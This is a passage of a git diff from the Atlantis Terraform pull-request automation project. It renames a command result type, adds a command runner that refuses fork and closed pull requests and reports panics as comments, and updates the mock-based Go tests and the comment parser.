- ch.AllowForkPRs = false // by default it's false so don't need to reset
- var pull github.PullRequest
- modelPull := models.PullRequest{State: models.Open}
- When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
-
- headRepo := fixtures.GithubRepo
- headRepo.FullName = "forkrepo/atlantis"
- headRepo.Owner = "forkrepo"
- When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, headRepo, nil)
-
- ch.ExecuteCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, nil)
- vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. To enable, set --"+ch.AllowForkPRsFlag)
-}
-
-func TestExecuteCommand_ClosedPull(t *testing.T) {
- t.Log("if a command is run on a closed pull request atlantis should" +
- " comment saying that this is not allowed")
- setup(t)
- pull := &github.PullRequest{
- State: github.String("closed"),
- }
- modelPull := models.PullRequest{State: models.Closed}
- When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
- When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, fixtures.GithubRepo, nil)
-
- ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
- vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests")
-}
-
-func TestExecuteCommand_WorkspaceLocked(t *testing.T) {
- t.Log("if the workspace is locked, should comment back on the pull")
- setup(t)
- pull := &github.PullRequest{
- State: github.String("closed"),
- }
- cmd := events.Command{
- Name: events.Plan,
- Workspace: "workspace",
- }
-
- When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
- When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil)
- When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(false)
- ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd)
-
- msg := "The workspace workspace is currently locked by another" +
- " command that is running for this pull request." +
- " Wait until the previous command is complete and try again."
- ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd)
- _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResponse()).GetCapturedArguments()
- Equals(t, msg, response.Failure)
- vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, fixtures.Pull.Num,
- "**Plan Failed**: "+msg+"\n\n")
-}
-
-func TestExecuteCommand_FullRun(t *testing.T) {
- t.Log("when running a plan, apply should comment")
- pull := &github.PullRequest{
- State: github.String("closed"),
- }
- cmdResponse := events.CommandResponse{}
- for _, c := range []events.CommandName{events.Plan, events.Apply} {
- setup(t)
- cmd := events.Command{
- Name: c,
- Workspace: "workspace",
- }
- When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
- When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil)
- When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true)
- switch c {
- case events.Plan:
- When(planner.Execute(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
- case events.Apply:
- When(applier.Execute(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
- }
-
- ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd)
-
- ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd)
- _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResponse()).GetCapturedArguments()
- Equals(t, cmdResponse, response)
- vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
- workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)
- }
-}
-
-func TestExecuteCommand_ForkPREnabled(t *testing.T) {
- t.Log("when running a plan on a fork PR, it should succeed")
- setup(t)
-
- // Enable forked PRs.
- ch.AllowForkPRs = true
- defer func() { ch.AllowForkPRs = false }() // Reset after test.
-
- var pull github.PullRequest
- cmdResponse := events.CommandResponse{}
- cmd := events.Command{
- Name: events.Plan,
- Workspace: "workspace",
- }
- When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
- headRepo := fixtures.GithubRepo
- headRepo.FullName = "forkrepo/atlantis"
- headRepo.Owner = "forkrepo"
- When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil)
- When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true)
- When(planner.Execute(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
-
- ch.ExecuteCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd)
-
- ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd)
- _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResponse()).GetCapturedArguments()
- Equals(t, cmdResponse, response)
- vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
- workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)
-}
diff --git a/server/events/command_response.go b/server/events/command_response.go
deleted file mode 100644
index abba3897b4..0000000000
--- a/server/events/command_response.go
+++ /dev/null
@@ -1,21 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-// CommandResponse is the result of running a Command.
-type CommandResponse struct {
- Error error
- Failure string
- ProjectResults []ProjectResult
-}
diff --git a/server/events/command_result.go b/server/events/command_result.go
new file mode 100644
index 0000000000..ff767ddb58
--- /dev/null
+++ b/server/events/command_result.go
@@ -0,0 +1,21 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events
+
+// CommandResult is the result of running a Command.
+type CommandResult struct {
+ Error error
+ Failure string
+ ProjectResults []ProjectResult
+}
diff --git a/server/events/command_runner.go b/server/events/command_runner.go
new file mode 100644
index 0000000000..04fbb7f129
--- /dev/null
+++ b/server/events/command_runner.go
@@ -0,0 +1,255 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events
+
+import (
+ "fmt"
+
+ "github.com/google/go-github/github"
+ "github.com/lkysow/go-gitlab"
+ "github.com/pkg/errors"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/vcs"
+ "github.com/runatlantis/atlantis/server/logging"
+ "github.com/runatlantis/atlantis/server/recovery"
+)
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_command_runner.go CommandRunner
+
+// CommandRunner is the first step after a command request has been parsed.
+type CommandRunner interface {
+ // RunCommentCommand is the first step after a command request has been parsed.
+ // It handles gathering additional information needed to execute the command
+ // and then calling the appropriate services to finish executing the command.
+ RunCommentCommand(baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, cmd *CommentCommand)
+ RunAutoplanCommand(baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User)
+}
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_github_pull_getter.go GithubPullGetter
+
+// GithubPullGetter makes API calls to get pull requests.
+type GithubPullGetter interface {
+ // GetPullRequest gets the pull request with id pullNum for the repo.
+ GetPullRequest(repo models.Repo, pullNum int) (*github.PullRequest, error)
+}
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_gitlab_merge_request_getter.go GitlabMergeRequestGetter
+
+// GitlabMergeRequestGetter makes API calls to get merge requests.
+type GitlabMergeRequestGetter interface {
+ // GetMergeRequest gets the pull request with the id pullNum for the repo.
+ GetMergeRequest(repoFullName string, pullNum int) (*gitlab.MergeRequest, error)
+}
+
+// DefaultCommandRunner is the first step when processing a comment command.
+type DefaultCommandRunner struct {
+ VCSClient vcs.ClientProxy
+ GithubPullGetter GithubPullGetter
+ GitlabMergeRequestGetter GitlabMergeRequestGetter
+ CommitStatusUpdater CommitStatusUpdater
+ EventParser EventParsing
+ MarkdownRenderer *MarkdownRenderer
+ Logger logging.SimpleLogging
+ // AllowForkPRs controls whether we operate on pull requests from forks.
+ AllowForkPRs bool
+ // AllowForkPRsFlag is the name of the flag that controls fork PR's. We use
+ // this in our error message back to the user on a forked PR so they know
+ // how to enable this functionality.
+ AllowForkPRsFlag string
+ ProjectCommandBuilder ProjectCommandBuilder
+ ProjectCommandRunner ProjectCommandRunner
+}
+
+func (c *DefaultCommandRunner) RunAutoplanCommand(baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User) {
+ log := c.buildLogger(baseRepo.FullName, pull.Num)
+ ctx := &CommandContext{
+ User: user,
+ Log: log,
+ Pull: pull,
+ HeadRepo: headRepo,
+ BaseRepo: baseRepo,
+ }
+ defer c.logPanics(ctx)
+ if !c.validateCtxAndComment(ctx) {
+ return
+ }
+ if err := c.CommitStatusUpdater.Update(ctx.BaseRepo, ctx.Pull, vcs.Pending, Plan); err != nil {
+ ctx.Log.Warn("unable to update commit status: %s", err)
+ }
+
+ projectCmds, err := c.ProjectCommandBuilder.BuildAutoplanCommands(ctx)
+ if err != nil {
+ c.updatePull(ctx, AutoplanCommand{}, CommandResult{Error: err})
+ return
+ }
+
+ var results []ProjectResult
+ for _, cmd := range projectCmds {
+ res := c.ProjectCommandRunner.Plan(cmd)
+ results = append(results, ProjectResult{
+ ProjectCommandResult: res,
+ RepoRelDir: cmd.RepoRelDir,
+ Workspace: cmd.Workspace,
+ })
+ }
+ c.updatePull(ctx, AutoplanCommand{}, CommandResult{ProjectResults: results})
+}
+
+// RunCommentCommand executes the command.
+// We take in a pointer for maybeHeadRepo because for some events there isn't
+// enough data to construct the Repo model and callers might want to wait until
+// the event is further validated before making an additional (potentially
+// wasteful) call to get the necessary data.
+func (c *DefaultCommandRunner) RunCommentCommand(baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, cmd *CommentCommand) {
+ log := c.buildLogger(baseRepo.FullName, pullNum)
+ var headRepo models.Repo
+ if maybeHeadRepo != nil {
+ headRepo = *maybeHeadRepo
+ }
+
+ var err error
+ var pull models.PullRequest
+ switch baseRepo.VCSHost.Type {
+ case models.Github:
+ pull, headRepo, err = c.getGithubData(baseRepo, pullNum)
+ case models.Gitlab:
+ pull, err = c.getGitlabData(baseRepo, pullNum)
+ default:
+ err = errors.New("Unknown VCS type, this is a bug!")
+ }
+ if err != nil {
+ log.Err(err.Error())
+ return
+ }
+ ctx := &CommandContext{
+ User: user,
+ Log: log,
+ Pull: pull,
+ HeadRepo: headRepo,
+ BaseRepo: baseRepo,
+ }
+ defer c.logPanics(ctx)
+
+ if !c.validateCtxAndComment(ctx) {
+ return
+ }
+
+ if err := c.CommitStatusUpdater.Update(ctx.BaseRepo, ctx.Pull, vcs.Pending, cmd.CommandName()); err != nil {
+ ctx.Log.Warn("unable to update commit status: %s", err)
+ }
+
+ var result ProjectCommandResult
+ switch cmd.Name {
+ case Plan:
+ projectCmd, err := c.ProjectCommandBuilder.BuildPlanCommand(ctx, cmd)
+ if err != nil {
+ c.updatePull(ctx, cmd, CommandResult{Error: err})
+ return
+ }
+ result = c.ProjectCommandRunner.Plan(projectCmd)
+ case Apply:
+ projectCmd, err := c.ProjectCommandBuilder.BuildApplyCommand(ctx, cmd)
+ if err != nil {
+ c.updatePull(ctx, cmd, CommandResult{Error: err})
+ return
+ }
+ result = c.ProjectCommandRunner.Apply(projectCmd)
+ default:
+ ctx.Log.Err("failed to determine desired command, neither plan nor apply")
+ return
+ }
+
+ c.updatePull(
+ ctx,
+ cmd,
+ CommandResult{
+ ProjectResults: []ProjectResult{{
+ RepoRelDir: cmd.RepoRelDir,
+ Workspace: cmd.Workspace,
+ ProjectCommandResult: result,
+ }}})
+}
+
+func (c *DefaultCommandRunner) getGithubData(baseRepo models.Repo, pullNum int) (models.PullRequest, models.Repo, error) {
+ if c.GithubPullGetter == nil {
+ return models.PullRequest{}, models.Repo{}, errors.New("Atlantis not configured to support GitHub")
+ }
+ ghPull, err := c.GithubPullGetter.GetPullRequest(baseRepo, pullNum)
+ if err != nil {
+ return models.PullRequest{}, models.Repo{}, errors.Wrap(err, "making pull request API call to GitHub")
+ }
+ pull, _, headRepo, err := c.EventParser.ParseGithubPull(ghPull)
+ if err != nil {
+ return pull, headRepo, errors.Wrap(err, "extracting required fields from comment data")
+ }
+ return pull, headRepo, nil
+}
+
+func (c *DefaultCommandRunner) getGitlabData(baseRepo models.Repo, pullNum int) (models.PullRequest, error) {
+ if c.GitlabMergeRequestGetter == nil {
+ return models.PullRequest{}, errors.New("Atlantis not configured to support GitLab")
+ }
+ mr, err := c.GitlabMergeRequestGetter.GetMergeRequest(baseRepo.FullName, pullNum)
+ if err != nil {
+ return models.PullRequest{}, errors.Wrap(err, "making merge request API call to GitLab")
+ }
+ pull := c.EventParser.ParseGitlabMergeRequest(mr, baseRepo)
+ return pull, nil
+}
+
+func (c *DefaultCommandRunner) buildLogger(repoFullName string, pullNum int) *logging.SimpleLogger {
+ src := fmt.Sprintf("%s#%d", repoFullName, pullNum)
+ return logging.NewSimpleLogger(src, c.Logger.Underlying(), true, c.Logger.GetLevel())
+}
+
+func (c *DefaultCommandRunner) validateCtxAndComment(ctx *CommandContext) bool {
+ if !c.AllowForkPRs && ctx.HeadRepo.Owner != ctx.BaseRepo.Owner {
+ ctx.Log.Info("command was run on a fork pull request which is disallowed")
+ c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, fmt.Sprintf("Atlantis commands can't be run on fork pull requests. To enable, set --%s", c.AllowForkPRsFlag)) // nolint: errcheck
+ return false
+ }
+
+ if ctx.Pull.State != models.Open {
+ ctx.Log.Info("command was run on closed pull request")
+ c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, "Atlantis commands can't be run on closed pull requests") // nolint: errcheck
+ return false
+ }
+ return true
+}
+
+func (c *DefaultCommandRunner) updatePull(ctx *CommandContext, command CommandInterface, res CommandResult) {
+ // Log if we got any errors or failures.
+ if res.Error != nil {
+ ctx.Log.Err(res.Error.Error())
+ } else if res.Failure != "" {
+ ctx.Log.Warn(res.Failure)
+ }
+
+ // Update the pull request's status icon and comment back.
+ if err := c.CommitStatusUpdater.UpdateProjectResult(ctx, command.CommandName(), res); err != nil {
+ ctx.Log.Warn("unable to update commit status: %s", err)
+ }
+ comment := c.MarkdownRenderer.Render(res, command.CommandName(), ctx.Log.History.String(), command.IsVerbose(), command.IsAutoplan())
+ c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, comment) // nolint: errcheck
+}
+
+// logPanics logs and creates a comment on the pull request for panics.
+func (c *DefaultCommandRunner) logPanics(ctx *CommandContext) {
+ if err := recover(); err != nil {
+ stack := recovery.Stack(3)
+ c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, // nolint: errcheck
+ fmt.Sprintf("**Error: goroutine panic. This is a bug.**\n```\n%s\n%s```", err, stack))
+ ctx.Log.Err("PANIC: %s\n%s", err, stack)
+ }
+}
diff --git a/server/events/command_runner_test.go b/server/events/command_runner_test.go
new file mode 100644
index 0000000000..0b1518c09c
--- /dev/null
+++ b/server/events/command_runner_test.go
@@ -0,0 +1,211 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events_test
+
+import (
+ "bytes"
+ "errors"
+ "log"
+ "strings"
+ "testing"
+
+ "github.com/google/go-github/github"
+ . "github.com/petergtz/pegomock"
+ "github.com/runatlantis/atlantis/server/events"
+ "github.com/runatlantis/atlantis/server/events/mocks"
+ "github.com/runatlantis/atlantis/server/events/mocks/matchers"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/models/fixtures"
+ "github.com/runatlantis/atlantis/server/events/vcs"
+ vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks"
+ logmocks "github.com/runatlantis/atlantis/server/logging/mocks"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+var projectCommandBuilder *mocks.MockProjectCommandBuilder
+var eventParsing *mocks.MockEventParsing
+var vcsClient *vcsmocks.MockClientProxy
+var ghStatus *mocks.MockCommitStatusUpdater
+var githubGetter *mocks.MockGithubPullGetter
+var gitlabGetter *mocks.MockGitlabMergeRequestGetter
+var ch events.DefaultCommandRunner
+var logBytes *bytes.Buffer
+
+func setup(t *testing.T) {
+ RegisterMockTestingT(t)
+ projectCommandBuilder = mocks.NewMockProjectCommandBuilder()
+ eventParsing = mocks.NewMockEventParsing()
+ ghStatus = mocks.NewMockCommitStatusUpdater()
+ vcsClient = vcsmocks.NewMockClientProxy()
+ githubGetter = mocks.NewMockGithubPullGetter()
+ gitlabGetter = mocks.NewMockGitlabMergeRequestGetter()
+ logger := logmocks.NewMockSimpleLogging()
+ logBytes = new(bytes.Buffer)
+ projectCommandRunner := mocks.NewMockProjectCommandRunner()
+ When(logger.Underlying()).ThenReturn(log.New(logBytes, "", 0))
+ ch = events.DefaultCommandRunner{
+ VCSClient: vcsClient,
+ CommitStatusUpdater: ghStatus,
+ EventParser: eventParsing,
+ MarkdownRenderer: &events.MarkdownRenderer{},
+ GithubPullGetter: githubGetter,
+ GitlabMergeRequestGetter: gitlabGetter,
+ Logger: logger,
+ AllowForkPRs: false,
+ AllowForkPRsFlag: "allow-fork-prs-flag",
+ ProjectCommandBuilder: projectCommandBuilder,
+ ProjectCommandRunner: projectCommandRunner,
+ }
+}
+
+func TestRunCommentCommand_LogPanics(t *testing.T) {
+ t.Log("if there is a panic it is commented back on the pull request")
+ setup(t)
+ ch.AllowForkPRs = true // Lets us get to the panic code.
+ defer func() { ch.AllowForkPRs = false }()
+ When(ghStatus.Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, events.Plan)).ThenPanic("panic")
+ ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil)
+ _, _, comment := vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()).GetCapturedArguments()
+ Assert(t, strings.Contains(comment, "Error: goroutine panic"), "comment should be about a goroutine panic")
+}
+
+func TestRunCommentCommand_NoGithubPullGetter(t *testing.T) {
+ t.Log("if DefaultCommandRunner was constructed with a nil GithubPullGetter an error should be logged")
+ setup(t)
+ ch.GithubPullGetter = nil
+ ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil)
+ Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitHub\n", logBytes.String())
+}
+
+func TestRunCommentCommand_NoGitlabMergeGetter(t *testing.T) {
+ t.Log("if DefaultCommandRunner was constructed with a nil GitlabMergeRequestGetter an error should be logged")
+ setup(t)
+ ch.GitlabMergeRequestGetter = nil
+ ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, 1, nil)
+ Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitLab\n", logBytes.String())
+}
+
+func TestRunCommentCommand_GithubPullErr(t *testing.T) {
+ t.Log("if getting the github pull request fails an error should be logged")
+ setup(t)
+ When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err"))
+ ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
+ Equals(t, "[ERROR] runatlantis/atlantis#1: Making pull request API call to GitHub: err\n", logBytes.String())
+}
+
+func TestRunCommentCommand_GitlabMergeRequestErr(t *testing.T) {
+ t.Log("if getting the gitlab merge request fails an error should be logged")
+ setup(t)
+ When(gitlabGetter.GetMergeRequest(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err"))
+ ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, fixtures.Pull.Num, nil)
+ Equals(t, "[ERROR] runatlantis/atlantis#1: Making merge request API call to GitLab: err\n", logBytes.String())
+}
+
+func TestRunCommentCommand_GithubPullParseErr(t *testing.T) {
+ t.Log("if parsing the returned github pull request fails an error should be logged")
+ setup(t)
+ var pull github.PullRequest
+ When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
+ When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, fixtures.GitlabRepo, errors.New("err"))
+
+ ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
+ Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String())
+}
+
+func TestRunCommentCommand_ForkPRDisabled(t *testing.T) {
+ t.Log("if a command is run on a forked pull request and this is disabled atlantis should" +
+ " comment saying that this is not allowed")
+ setup(t)
+ ch.AllowForkPRs = false // by default it's false so don't need to reset
+ var pull github.PullRequest
+ modelPull := models.PullRequest{State: models.Open}
+ When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
+
+ headRepo := fixtures.GithubRepo
+ headRepo.FullName = "forkrepo/atlantis"
+ headRepo.Owner = "forkrepo"
+ When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, modelPull.BaseRepo, headRepo, nil)
+
+ ch.RunCommentCommand(fixtures.GithubRepo, nil, fixtures.User, fixtures.Pull.Num, nil)
+ vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. To enable, set --"+ch.AllowForkPRsFlag)
+}
+
+func TestRunCommentCommand_ClosedPull(t *testing.T) {
+ t.Log("if a command is run on a closed pull request atlantis should" +
+ " comment saying that this is not allowed")
+ setup(t)
+ pull := &github.PullRequest{
+ State: github.String("closed"),
+ }
+ modelPull := models.PullRequest{State: models.Closed}
+ When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
+ When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, modelPull.BaseRepo, fixtures.GithubRepo, nil)
+
+ ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
+ vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests")
+}
+
+func TestRunCommentCommand_FullRun(t *testing.T) {
+ pull := &github.PullRequest{
+ State: github.String("closed"),
+ }
+ expCmdResult := events.CommandResult{
+ ProjectResults: []events.ProjectResult{
+ {
+ RepoRelDir: ".",
+ Workspace: "default",
+ },
+ },
+ }
+ for _, c := range []events.CommandName{events.Plan, events.Apply} {
+ setup(t)
+ cmd := events.NewCommentCommand(".", nil, c, false, "default", "")
+ When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
+ When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, fixtures.GithubRepo, nil)
+
+ cmdCtx := models.ProjectCommandContext{RepoRelDir: "."}
+ switch c {
+ case events.Plan:
+ When(projectCommandBuilder.BuildPlanCommand(matchers.AnyPtrToEventsCommandContext(), matchers.AnyPtrToEventsCommentCommand())).ThenReturn(cmdCtx, nil)
+ case events.Apply:
+ When(projectCommandBuilder.BuildApplyCommand(matchers.AnyPtrToEventsCommandContext(), matchers.AnyPtrToEventsCommentCommand())).ThenReturn(cmdCtx, nil)
+ }
+
+ ch.RunCommentCommand(fixtures.GithubRepo, nil, fixtures.User, fixtures.Pull.Num, cmd)
+
+ ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, c)
+ _, _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandName(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
+ Equals(t, expCmdResult, response)
+ vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
+ }
+}
+
+func TestRunAutoplanCommands(t *testing.T) {
+ expCmdResult := events.CommandResult{
+ ProjectResults: []events.ProjectResult{
+ {
+ RepoRelDir: ".",
+ Workspace: "default",
+ },
+ },
+ }
+ setup(t)
+ When(projectCommandBuilder.BuildAutoplanCommands(matchers.AnyPtrToEventsCommandContext())).ThenReturn([]models.ProjectCommandContext{{RepoRelDir: ".", Workspace: "default"}}, nil)
+ ch.RunAutoplanCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.Pull, fixtures.User)
+
+ ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, events.Plan)
+ _, _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandName(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
+ Equals(t, expCmdResult, response)
+ vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
+}
diff --git a/server/events/comment_parser.go b/server/events/comment_parser.go
index d0e921d79e..46e30708ce 100644
--- a/server/events/comment_parser.go
+++ b/server/events/comment_parser.go
@@ -21,6 +21,7 @@ import (
"strings"
"github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/yaml"
"github.com/spf13/pflag"
)
@@ -29,8 +30,12 @@ const (
WorkspaceFlagShort = "w"
DirFlagLong = "dir"
DirFlagShort = "d"
+ ProjectFlagLong = "project"
+ ProjectFlagShort = "p"
VerboseFlagLong = "verbose"
VerboseFlagShort = ""
+ DefaultWorkspace = "default"
+ DefaultDir = "."
)
//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_comment_parsing.go CommentParsing
@@ -54,7 +59,7 @@ type CommentParser struct {
type CommentParseResult struct {
// Command is the successfully parsed command. Will be nil if
// CommentResponse or Ignore is set.
- Command *Command
+ Command *CommentCommand
// CommentResponse is set when we should respond immediately to the command
// for example for atlantis help.
CommentResponse string
@@ -129,27 +134,29 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen
var workspace string
var dir string
+ var project string
var verbose bool
var extraArgs []string
var flagSet *pflag.FlagSet
var name CommandName
// Set up the flag parsing depending on the command.
- const defaultWorkspace = "default"
switch command {
case Plan.String():
name = Plan
flagSet = pflag.NewFlagSet(Plan.String(), pflag.ContinueOnError)
flagSet.SetOutput(ioutil.Discard)
- flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, defaultWorkspace, "Switch to this Terraform workspace before planning.")
- flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, "", "Which directory to run plan in relative to root of repo. Use '.' for root. If not specified, will attempt to run plan for all Terraform projects we think were modified in this changeset.")
+ flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, DefaultWorkspace, "Switch to this Terraform workspace before planning.")
